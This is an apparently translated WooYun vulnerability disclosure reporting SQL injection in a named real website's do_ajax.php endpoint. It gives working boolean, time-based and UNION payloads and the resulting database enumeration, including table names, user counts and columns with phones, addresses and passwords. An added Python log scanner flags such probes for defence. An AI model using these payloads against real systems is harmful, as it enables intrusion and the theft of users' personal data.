WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
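2015-04-17: Details reported to the vendor; awaiting vendor response
2015-04-17: Vendor confirmed; details disclosed to the vendor only
2015-04-27: Details disclosed to core white hats and relevant domain experts
2015-05-07: Details disclosed to regular white hats
2015-05-17: Details disclosed to intern white hats
2015-06-01: Details disclosed to the public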
http://try.mama.cn/do_ajax.php?area_id=2&do=area
Parameter: id
12-2*5+0+0+1-1 returns TRUE
12-2*6+0+0+1-1 returns FALSE
2 AND 2+1-1-1=1 AND 380=380 returns TRUE
2 AND 3+1-1-1=1 AND 380=380 returns FALSE
This shows the vulnerability exists.
---
Parameter: area_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: area_id=2 AND 9680=9680&do=area

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: area_id=2 AND (SELECT * FROM (SELECT(SLEEP(5)))LJBO)&do=area

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: area_id=2 UNION ALL SELECT CONCAT(0x7176626a71,0x7050487357756666456b,0x717a706b71),NULL,NULL,NULL-- &do=area
---
web application technology: PHP 5.3.28
back-end DBMS: MySQL 5.0.12

Database: try
[49 tables]
+-----------------------+
| spe_admin             |   3 administrator accounts
| syw_activity          |
......

Database: try
+-----------------------+---------+
| Table                 | Entries |
+-----------------------+---------+
| syw_apply             | 1348949 |
| syw_optionvars        | 995365  |
| syw_user              | 974296  |   970,000

Table: syw_user
[10 entries]
Columns: id, city_id, discuz_uid, province_id, district_id, email, phone, handle, from, zipcode, updates, address, credits, baby_sex, password, is_start, is_daren, username, realname, add_time, lastvisit, baby_name, baby_birth, babystatus, active_time, update_time

Users' names, phone numbers, home addresses, account passwords....
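If this information were leaked, there would be even more fraud cases, and users would suffer even greater harm. I hope the vendor takes this seriously.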
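An added example, not part of the original report: a log check that flags requests whose area_id is not a plain integer and labels the probe style (arithmetic, boolean, time-based, UNION) seen in the tests above. The log format, the client address and the function names classify_area_id and scan are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Probe styles seen in the report, most specific first.
PROBES = [
    ("time-based", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
    ("union", re.compile(r"\bunion\b.+\bselect\b", re.I)),
    ("boolean", re.compile(r"\b(and|or)\b.+=", re.I)),
    ("arithmetic", re.compile(r"^\s*\d+(\s*[-+*/]\s*\d+)+\s*$")),
]
# Assumed combined-log layout: client address first, request line in quotes.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP')

def classify_area_id(value):
    """Return None for a plain integer id, else a label for the probe style."""
    if re.fullmatch(r"[0-9]{1,10}", value):
        return None
    for label, pattern in PROBES:
        if pattern.search(value):
            return label
    return "non-numeric"

def scan(log_lines, param="area_id"):
    """Return (client, label, decoded value) for each suspicious request."""
    hits = []
    for line in log_lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        values = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for value in values.get(param, []):
            label = classify_area_id(value)
            if label:
                hits.append((client, label, value))
    return hits

# Constructed sample log (documentation IP range, made-up timestamps).
_P = '203.0.113.7 - - [17/Apr/2015:10:00:0%d +0800] "GET /do_ajax.php?area_id=%s&do=area HTTP/1.1" 200 512'
SAMPLE_LOG = [_P % (i, v) for i, v in enumerate([
    "2",
    "12-2*5%2B0%2B0%2B1-1",
    "2%20AND%202%2B1-1-1%3D1%20AND%20380%3D380",
    "2%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))LJBO)",
    "2%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL--%20",
])]

if __name__ == "__main__":
    for client, label, value in scan(SAMPLE_LOG):
        print(client, label, repr(value))
```

The same strict integer test in classify_area_id, applied in the application before the value reaches the query, rejects every probe listed in the report.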
Severity: Medium
Vulnerability Rank: 10
Confirmed at: 2015-04-17 14:05
Thank you
None yet